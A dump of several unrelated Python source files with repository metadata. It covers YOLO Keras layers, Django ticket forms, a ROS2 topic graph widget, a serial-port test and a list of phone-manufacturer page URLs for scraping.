self.file = os.path.join(os.pardir, 'configuration', 'config.ini')
self.config = ConfigParser()
self.config.read(self.file)
self.sections = self.config.sections()
self.raw_data = data_handler.get_data(self.config.get(section='datadotworld',
option='key'), self.config.get(section='datadotworld',
option='data_name'))
def tearDown():
pass
def test_get_data_function_return(self):
self.assertEqual(type(self.raw_data), type(pd.DataFrame))
def test_clean_data_function_return(self):
self.assertEqual(type(data_handler.clean_data(self.raw_data)),
type(pd.DataFrame))
# test that dataframe function returns certain basic columns
if __name__ == '__main__':
unittest.main()
| UTF-8 | Python | false | false | 1,689 | py | 8 | test_data.py | 6 | 0.629959 | 0.629959 | 0 | 56 | 29.160714 | 85 |
Bierkaai/python-mp-preprocessor-old | 11,441,792,923,911 | 3086725164617de92d4ec93a0170ea69e6cd44df | f449847dd1f93d28448e6d7699e04f709c463269 | /enhancedmp/toytest.py | b1c54d3037da3ad5cd45f01175cb5408aae2bd3b | [
"MIT"
]
| permissive | https://github.com/Bierkaai/python-mp-preprocessor-old | e76b9683c1c1477979878d36543867e7c74a33b8 | 61717acf74da7e4bb373d5922c1b2e1d3795e634 | refs/heads/master | 2020-05-03T03:33:51.205803 | 2014-09-30T08:03:36 | 2014-09-30T08:03:36 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | __author__ = 'coen'
import sys
import time
import random
from enhancedprocessors import *
from multiprocessing import Pipe
from stoppablemultiprocessing import Message, STOP
class RandomLogger(StoppableLoggingProcess):
def __init__(self, logqueue, message_conn, name):
super(RandomLogger, self).__init__(logqueue, message_conn, name)
random.seed()
def process(self):
time.sleep(random.randint(0,5))
self.debug("Slept a while. Woke up")
time.sleep(random.randint(0,5))
self.debug("Going back to sleep...")
if __name__ == "__main__":
logqueue, logger, logger_connection = setuplogging("logfile.log", FULLDEBUG)
sleepers = []
connections = []
for x in range(4):
to_process, to_me = Pipe()
connections.append(to_me)
sleeper = RandomLogger(logqueue, to_process, "Sleeper {0}".format(x))
sleepers.append(sleeper)
logqueue.put(LogMessage(DEBUG, "TEST"))
logger.start()
time.sleep(5)
for s in sleepers:
s.start()
time.sleep(20)
for c in connections:
c.send(Message(STOP))
for s in sleepers:
s.join()
time.sleep(10)
logger_connection.send(Message(STOP))
logger.join()
| UTF-8 | Python | false | false | 1,249 | py | 7 | toytest.py | 6 | 0.629303 | 0.620496 | 0 | 57 | 20.859649 | 80 |
arjonatorres/alarma | 15,315,853,420,704 | 6ef4dc09a1fdf7e271d799d89de9550901b3407e | 0601dae2296d36728c57d940de89d49a7fab444a | /home/pertest.py | 3c94407affcf9783d7afcb47a6b87551061dc7db | []
| no_license | https://github.com/arjonatorres/alarma | 50efa583616424ea12e3aab48d79875f90a9e513 | 6758f483e49e638510abf15889b4fc15a9bf078a | refs/heads/master | 2021-04-28T02:53:42.583834 | 2021-02-03T14:51:37 | 2021-02-03T14:51:37 | 122,125,985 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import serial
import time
ser = serial.Serial('/dev/ttyUSB0',9600,bytesize=8,parity='N',stopbits=1,timeout=1)
#ser.close()
#ser.open()
time.sleep(0.25)
ser.setRTS(True)
time.sleep(0.03)
ser.write("\x14\x6A")
time.sleep(0.03)
ser.flushInput()
ser.setRTS(False)
state=ser.read(8)
time.sleep(0.1)
print state.encode('hex')
ser.close()
#if len(state.encode('hex')) == 20:
# if ((str(state.encode('hex'))[len(state.encode('hex'))-16$
# dato1 = (str(state.encode('hex'))[len(state.encod$
# dato2 = (str(state.encode('hex'))[len(state.encod$
# dato = dato1 + dato2
# else:
# dato = "Error"
# return dato
#else:
# dato = "En movimiento"
# return dato
| UTF-8 | Python | false | false | 743 | py | 116 | pertest.py | 107 | 0.58681 | 0.545087 | 0.002692 | 31 | 22.935484 | 83 |
mdrago98/Seal-Counting | 5,686,536,715,779 | 77fff26c1272356fb6791765cddf2686cc0d4ccc | ac1a76db0627dbc797898bc991915f614c5e9bd0 | /yolo/layers.py | 03593c278991d94b7c631664badd6ac62b4d94df | []
| no_license | https://github.com/mdrago98/Seal-Counting | d529dbbfce4f5111ee865d46a67e59cfda3d8f9a | 03d4b5cf8f21a8d1817e34e3e94db3091e32c7ef | refs/heads/master | 2022-12-12T16:01:40.123786 | 2020-08-25T14:01:24 | 2020-08-25T14:01:24 | 274,442,444 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from tensorflow.keras.layers import (
Add,
Concatenate,
Conv2D,
Input,
Lambda,
LeakyReLU,
UpSampling2D,
ZeroPadding2D,
BatchNormalization,
)
from tensorflow.keras.regularizers import l2
from tensorflow.python.keras.models import Model
import tensorflow as tf
import numpy as np
def darknet_conv(x, filters, size, strides=1, batch_norm=True):
"""
decalres the darknet convolution
:param x: the input
:param filters: the number of filters
:param size: the size of a filter
:param strides: the number of strides
:param batch_norm: tru IFF batch normalisation is to be applied
:return: the transformed input
"""
if strides == 1:
padding = "same"
else:
x = ZeroPadding2D(((1, 0), (1, 0)))(x) # top left half-padding
padding = "valid"
x = Conv2D(
filters=filters,
kernel_size=size,
strides=strides,
padding=padding,
use_bias=not batch_norm,
kernel_regularizer=l2(0.0005),
)(x)
if batch_norm:
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.1)(x)
return x
def darknet_res(x, filters):
"""
Defines the darknet residual block
:param x: the input
:param filters: the number of filters
:return: the transformed residual
"""
prev = x
x = darknet_conv(x, filters // 2, 1)
x = darknet_conv(x, filters, 3)
x = Add()([prev, x])
return x
def blocking_convolution(x, filters, blocks):
x = darknet_conv(x, filters, 3, strides=2)
for _ in range(blocks):
x = darknet_res(x, filters)
return x
def out_conv(filters, name=None):
"""
Declares the output convolution
:param filters: the number of filters
:param name: the name
:return: the output conv function
"""
def yolo_conv(x_in):
if isinstance(x_in, tuple):
inputs = Input(x_in[0].shape[1:]), Input(x_in[1].shape[1:])
x, x_skip = inputs
# concatenate with skip
x = darknet_conv(x, filters, 1)
x = UpSampling2D(2)(x)
x = Concatenate()([x, x_skip])
else:
x = inputs = Input(x_in.shape[1:])
x = darknet_conv(x, filters, 1)
x = darknet_conv(x, filters * 2, 3)
x = darknet_conv(x, filters, 1)
x = darknet_conv(x, filters * 2, 3)
x = darknet_conv(x, filters, 1)
return Model(inputs, x, name=name)(x_in)
return yolo_conv
def yolt_block(x, filters):
x = darknet_conv(x, filters, 3)
# prev = x
x = darknet_conv(x, filters // 2, 1)
x = darknet_conv(x, filters, 3)
# x = Add()([prev, x])
return x
def yolo_boxes(pred: tf.Tensor, anchors: np.array, classes: int) -> tuple:
"""
A function to decode the yolo output into bounding boxes, confidence and the original record
:param pred: the prediction tensor in the shape (batch_size, grid, grid, anchors, (x, y, w, h, obj, ...classes))
:param anchors: the anchors of the relevant scale
:param classes: the number of classes
:return: a tuple of bbox, objectness, class_probs, pred_box
"""
# pred: (batch_size, grid, grid, anchors, (x, y, w, h, obj, ...classes))
grid_size = tf.shape(pred)[1:3]
box_xy, box_wh, objectness, class_probs = tf.split(pred, (2, 2, 1, classes), axis=-1)
box_xy = tf.sigmoid(box_xy)
objectness = tf.sigmoid(objectness)
class_probs = tf.sigmoid(class_probs)
pred_box = tf.concat((box_xy, box_wh), axis=-1) # original xywh for loss
# !!! grid[x][y] == (y, x)
grid = tf.meshgrid(tf.range(grid_size[1]), tf.range(grid_size[0]))
grid = tf.expand_dims(tf.stack(grid, axis=-1), axis=2) # [gx, gy, 1, 2]
box_xy = (box_xy + tf.cast(grid, tf.float32)) / tf.cast(grid_size, tf.float32)
box_wh = tf.exp(box_wh) * anchors
box_x1y1 = box_xy - box_wh / 2
box_x2y2 = box_xy + box_wh / 2
bbox = tf.concat([box_x1y1, box_x2y2], axis=-1)
return bbox, objectness, class_probs, pred_box
def yolo_out(filters, anchors: np.array, classes, name=None):
"""
Defines the yolo output convolutions
:param filters: the number of filters
:param anchors: the anchors
:param classes: the number of classes
:param name: the name of the block
:return: the transformed yolo output kernel
"""
def yolo_output(x_in):
x = inputs = Input(x_in.shape[1:])
x = darknet_conv(x, filters * 2, 3)
x = darknet_conv(x, anchors * (classes + 5), 1, batch_norm=False)
x = Lambda(
lambda x: tf.reshape(x, (-1, tf.shape(x)[1], tf.shape(x)[2], anchors, classes + 5))
)(x)
return tf.keras.Model(inputs, x, name=name)(x_in)
return yolo_output
def yolt_block(x, filters):
x = darknet_conv(x, filters, 3)
# prev = x
x = darknet_conv(x, filters // 2, 1)
x = darknet_conv(x, filters, 3)
# x = Add()([prev, x])
return x
def yolo_nms(
outputs, anchors, masks, classes, yolo_max_boxes, yolo_iou_threshold, yolo_score_threshold
):
# boxes, conf, type
b, c, t = [], [], []
for o in outputs:
b.append(tf.reshape(o[0], (tf.shape(o[0])[0], -1, tf.shape(o[0])[-1])))
c.append(tf.reshape(o[1], (tf.shape(o[1])[0], -1, tf.shape(o[1])[-1])))
t.append(tf.reshape(o[2], (tf.shape(o[2])[0], -1, tf.shape(o[2])[-1])))
bbox = tf.concat(b, axis=1)
confidence = tf.concat(c, axis=1)
class_probs = tf.concat(t, axis=1)
scores = confidence * class_probs
boxes, scores, classes, valid_detections = tf.image.combined_non_max_suppression(
boxes=tf.reshape(bbox, (tf.shape(bbox)[0], -1, 1, 4)),
scores=tf.reshape(scores, (tf.shape(scores)[0], -1, tf.shape(scores)[-1])),
max_output_size_per_class=yolo_max_boxes,
max_total_size=yolo_max_boxes,
iou_threshold=yolo_iou_threshold,
score_threshold=yolo_score_threshold,
)
return boxes, scores, classes, valid_detections
| UTF-8 | Python | false | false | 5,994 | py | 39 | layers.py | 24 | 0.59693 | 0.578078 | 0 | 194 | 29.896907 | 116 |
abzer0x/training | 4,604,204,953,115 | 4a9d0b3fe7fdb925ac22a74164d5176b11deeff4 | d8c1cae31ac0d10266e340905528afd9be16e458 | /training/ticketing_system/forms.py | 37782c253a42e1698ab30a247efda541defb1bbd | [
"MIT"
]
| permissive | https://github.com/abzer0x/training | 1c3065d774c0507df781f34a981ca3a931eb92cb | 7f418d563280b9d1ab939935206b023e4206cb54 | refs/heads/master | 2021-07-17T22:19:18.483633 | 2017-10-23T12:07:03 | 2017-10-23T12:07:03 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from django import forms
from .models import User
from .models import Ticket
CLASSES_INPUT_FIELD = {
'class': 'form-control'
}
class SignInForm(forms.Form):
email = forms.EmailField(
widget=forms.EmailInput(attrs=CLASSES_INPUT_FIELD),
max_length=150,
label='Email'
)
password = forms.CharField(
widget=forms.PasswordInput(attrs=CLASSES_INPUT_FIELD),
min_length=8,
max_length=60,
help_text='Use at least 8 characters.',
label='Password'
)
confirm_password = forms.CharField(
widget=forms.PasswordInput(attrs=CLASSES_INPUT_FIELD),
max_length=60,
label='Confirm Password'
)
name = forms.CharField(
widget=forms.TextInput(attrs=CLASSES_INPUT_FIELD),
max_length=150,
label='Name')
class LoginForm(forms.ModelForm):
class Meta:
model = User
fields = ['email', 'password']
widgets = {
'email': forms.TextInput(attrs=CLASSES_INPUT_FIELD),
'password': forms.PasswordInput(attrs=CLASSES_INPUT_FIELD),
}
class TicketCreateForm(forms.ModelForm):
class Meta:
model = Ticket
fields = ['title', 'body', 'assignee', 'status', 'author', 'created']
widgets = {
'title': forms.TextInput(attrs=CLASSES_INPUT_FIELD),
'body': forms.Textarea(attrs=CLASSES_INPUT_FIELD),
'author': forms.TextInput(attrs={
'class': 'form-control',
'readonly': 'readonly'
}),
'status': forms.Select(attrs={
'class': 'form-control',
'value': 'O'
}),
'created': forms.DateTimeInput(attrs={
'class': 'form-control',
'readonly': 'readonly'
}, format='%Y-%m-%d'),
'assignee': forms.SelectMultiple(
attrs={
'class': 'form-control select-multiple'
},
),
}
def __init__(self, *args, **kwargs):
super(TicketCreateForm, self).__init__(*args, **kwargs)
self.fields['assignee'].required = False
self.fields['author'].required = False
self.fields['status'].required = False
self.fields['created'].required = False
| UTF-8 | Python | false | false | 2,347 | py | 29 | forms.py | 5 | 0.550064 | 0.544525 | 0 | 80 | 28.3375 | 77 |
isse-augsburg/ROSSi | 12,747,462,964,015 | 6d9aa8e1e74bcfec8c5493899df1ece7807984fd | 53760bc15c89e0867739f91e8ea185dfaa4cc59c | /ROSSi_workspace/rossi_plugin/src/rossi_plugin/Ros2UI/UI/Editors/LiveDiagram/GraphEntities/RosRunningTopicGraphEntity.py | 13755d6250f9fea55610ead36ee2ee2d160d7dca | [
"MIT"
]
| permissive | https://github.com/isse-augsburg/ROSSi | 4af85c9febeda19f837a1685121ed5c373011dec | 66a23b6c133069325096d6e199e53d293e42d61b | refs/heads/main | 2023-07-15T08:44:54.524001 | 2021-08-31T14:42:24 | 2021-08-31T14:42:24 | 401,715,071 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from typing import Dict, List
from PyQt5 import QtCore, QtGui
from PyQt5.QtCore import QRectF
from PyQt5.QtWidgets import QGraphicsItem
from .RosRunningNodeGraphEntity import RosRunningNodeGraphEntity
from ...RosNodeEditor.utils import getAllFieldsOfTopic
from ....BaseGraphEntities.GraphMultipleEntryPort import GraphMultipleEntryPort
from ....UIElements.DialogWindow import DisplayParameter
from .....utils import dynamic_import_ros2_msg
from .....Representations.Ros2Representations.RosTopic import RosTopic
from ....BaseGraphEntities.AbstractGraphEntity import DataObject
from ....BaseGraphEntities.GraphExitPort import GraphExitPort
from ....BaseGraphEntities.StandartGraphEntity import StandartGraphEntity
class RosRunningTopicGraphEntity(StandartGraphEntity):
original_height: float = 70
entry: GraphMultipleEntryPort
exit: GraphExitPort
def __init__(self, topic: RosTopic, x: float, y: float, width: float = 70, height: float = 70, parent: QGraphicsItem = None, node=None):
super().__init__(parent, -1, x, y, width, self.original_height)
self.exit = GraphExitPort(self, self.width, self.height/2)
self.entry = GraphMultipleEntryPort(self, 0, self.height/2)
self.topic = topic
self.node = node
self.param = DisplayParameter("")
self.msg_dic = {}
self.createSubscriber()
def createSubscriber(self):
try:
#print(self.topic.msg_type[0])
klass = dynamic_import_ros2_msg(self.topic.msg_type[0])
#print(klass)
self.msg_dic = getAllFieldsOfTopic(self.topic.msg_type[0])
self.node.create_subscription(klass, self.topic.name, self.callback, 10)
o = klass()
# print("--------------____>", klass)
except:
self.param.setText("couldn't find class of msg type...")
def callback(self, msg):
if self.param is not None:
self.last_msg = msg
t = self.pretty(self.msg_dic, self.last_msg)
self.param.setText("couldn't find class of msg type " if t == "" else t)
def pretty(self, d, msg, indent=0) -> str:
ret = ""
for key, value in d.items():
if isinstance(value, dict):
ret += '\t' * indent + str(key) + "\n"
ret += self.pretty(value, msg, indent + 1) + "\n"
else:
if hasattr(msg, key):
t = '\t' * (indent + 1) + str(key) + " ("+str(value)+")" + ": " + str(getattr(msg, key)) + "\n"
ret += t#('\n'+'\t' * (indent + 2)).join(l for line in t.splitlines() for l in textwrap.wrap(t, width=100))
return ret
def paint(self, painter, option, widget):
super(RosRunningTopicGraphEntity, self).paint(painter, option, widget)
painter.drawText(QRectF(0, 0, self.width, self.original_height), QtCore.Qt.AlignCenter | QtCore.Qt.AlignCenter, self.topic.name)
def getData(self) -> DataObject:
pass
def _toDict(self) -> Dict:
pass
def toCode(self, intendLevel: int = 0):
pass
def getProperties(self):
return [self.param]
def mouseDoubleClickEvent(self, event: QtGui.QMouseEvent):
super(RosRunningTopicGraphEntity, self).mouseDoubleClickEvent(event)
self.param = DisplayParameter("")
def equals(self, topic: 'RosRunningTopicGraphEntity') -> bool:
return self.topic.equals(topic.topic)
def addPublisher(self, node: RosRunningNodeGraphEntity):
self.entry.connect(node.exit)
node.exit.drawConnection(self.entry)
def addSubscriber(self, node: RosRunningNodeGraphEntity):
node.entry.connect(self.exit)
self.exit.drawConnection(node.entry)
def removePublisher(self, node: RosRunningNodeGraphEntity):
node.exit.removeConnection(self.entry)
self.entry.disconnect(node.exit)
def removeSubscriber(self, node: RosRunningNodeGraphEntity):
node.entry.disconnect(self.exit)
self.exit.removeConnection(node.entry)
def getPublishers(self) -> List[RosRunningNodeGraphEntity]:
ret = []
for port in self.entry.connected_to_n:
ret.append(port.parentItem())
return ret
def getSubscribers(self) -> List[RosRunningNodeGraphEntity]:
ret = []
for line in self.exit.lines:
ret.append(line.target.parentItem())
return ret | UTF-8 | Python | false | false | 4,430 | py | 54 | RosRunningTopicGraphEntity.py | 52 | 0.644921 | 0.637923 | 0 | 113 | 38.212389 | 140 |
shengqiu/scrap | 6,408,091,234,519 | 9c86feae80332fd0bbdeb6f4936808fb3ab3b141 | 26abbca72c670b15995455dc3913172b8640d305 | /test/nameScript.py | 5d7be89579f1fa99e034d6a64cc52e91fb17e143 | []
| no_license | https://github.com/shengqiu/scrap | eca4550d5f5d5506feabd6a98be42cc214dc8ceb | 64a1730b6c40a64feeb83f9f0606dce196ffdb57 | refs/heads/master | 2019-12-18T16:10:03.535858 | 2017-04-21T01:38:15 | 2017-04-21T01:38:15 | 88,935,543 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | brandDict = [
{'url': 'https://rq.rogerstrade.com/devices/manufacturer/1?&p=1', 'brand': u'Acer'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/1?&p=2', 'brand': u'Acer'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/279', 'brand': u'Advantech'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/308', 'brand': u'Advent'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/368', 'brand': u'Agm'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/74?&p=1', 'brand': u'Alcatel'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/74?&p=2', 'brand': u'Alcatel'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/74?&p=3', 'brand': u'Alcatel'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/74?&p=4', 'brand': u'Alcatel'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/74?&p=5', 'brand': u'Alcatel'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/74?&p=6', 'brand': u'Alcatel'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/224', 'brand': u'Aluratek'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/4?&p=1', 'brand': u'Amazon'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/4?&p=2', 'brand': u'Amazon'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/357', 'brand': u'amgoo'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/298', 'brand': u'Amp'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/223', 'brand': u'Android'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/209', 'brand': u'Apex'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=1', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=2', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=3', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=4', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=5', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=6', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=7', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=8', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=9', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=10', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=11', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=12', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=13', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/6?&p=14', 'brand': u'Apple'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/78', 'brand': u'Archos'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/353', 'brand': u'Artchros'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/7?&p=1', 'brand': u'ASUS'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/7?&p=2', 'brand': u'ASUS'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/8', 'brand': u'AT&T'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/9?&p=1', 'brand': u'Audiovox'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/9?&p=2', 'brand': u'Audiovox'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/273', 'brand': u'Augen'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/260', 'brand': u'Azpen'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/11', 'brand': u'Barnes & Noble'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/317', 'brand': u'BBK'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/12?&p=1', 'brand': u'BlackBerry'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/12?&p=2', 'brand': u'BlackBerry'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/12?&p=3', 'brand': u'BlackBerry'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/12?&p=4', 'brand': u'BlackBerry'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/12?&p=5', 'brand': u'BlackBerry'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/12?&p=6', 'brand': u'BlackBerry'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/135?&p=1', 'brand': u'Blu'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/135?&p=2', 'brand': u'Blu'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/135?&p=3', 'brand': u'Blu'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/135?&p=4', 'brand': u'Blu'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/262', 'brand': u'Bmobile'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/265', 'brand': u'Budget Mobile'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/372', 'brand': u'Buzz'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/15', 'brand': u'Casio'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/126', 'brand': u'Caterpillar'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/300', 'brand': u'Cellon'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/96', 'brand': u'Cincinnati Bell'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/314', 'brand': u'CINGULAR'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/301', 'brand': u'Cinterion'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/86', 'brand': u'Cisco'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/269', 'brand': u'Clearnet'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/337', 'brand': u'Cobalt'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/151', 'brand': u'Coby Kyros'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/158', 'brand': u'Commtiva'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/119', 'brand': u'Coolpad'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/347', 'brand': u'COP'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/225', 'brand': u'Craig'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/98', 'brand': u'Cricket'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/394', 'brand': u'Cubot'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/83', 'brand': u'Custom'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/120', 'brand': u'Dapeng'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/19', 'brand': u'Dell'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/333', 'brand': u'Digicell'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/307', 'brand': u'Digiland'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/361', 'brand': u'Digital2'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/226', 'brand': u'Digix'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/211', 'brand': u'Doogee Mobile'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/121', 'brand': u'Doro'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/227', 'brand': u'Double Power Technology Inc.'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/283', 'brand': u'Eastcom'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/288', 'brand': u'Ecom'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/389', 'brand': u'Ekit'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/142', 'brand': u'Ellipsis'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/302', 'brand': u'Enfora'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/228', 'brand': u'EnviZen-Digital'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/20', 'brand': u'Ericsson'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/229', 'brand': u'Evga.Com Corp'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/261', 'brand': u'ExoPC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/230', 'brand': u'Filemate'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/385', 'brand': u'Firefly'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/73', 'brand': u'Fujitsu'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/124', 'brand': u'Garmin'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/155', 'brand': u'Garmin-Asus'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/22', 'brand': u'Gateway'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/376', 'brand': u'Gionee'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/378', 'brand': u'GO'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/24', 'brand': u'Google'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/215', 'brand': u'Gowell'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/349', 'brand': u'H20'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/231', 'brand': u'Hannspree'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/285', 'brand': u'Herbalife'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/232', 'brand': u'Hipstreet'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/233', 'brand': u'Hisense'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/97', 'brand': u'Hitachi'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/25?&p=1', 'brand': u'HP'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/25?&p=2', 'brand': u'HP'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/115', 'brand': u'HP Compaq'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=1', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=2', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=3', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=4', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=5', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=6', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=7', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=8', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=9', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=10', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=11', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=12', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=13', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=14', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/26?&p=15', 'brand': u'HTC'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/27?&p=1', 'brand': u'Huawei'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/27?&p=2', 'brand': u'Huawei'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/27?&p=3', 'brand': u'Huawei'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/27?&p=4', 'brand': u'Huawei'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/27?&p=5', 'brand': u'Huawei'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/299', 'brand': u'Hyundai'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/203', 'brand': u'i-mate'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/316', 'brand': u'IMR'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/331', 'brand': u'InFocus'},
{'url': 'https://rq.rogerstrade.com/devices /manufacturer/111', 'brand': u'Innostream'},
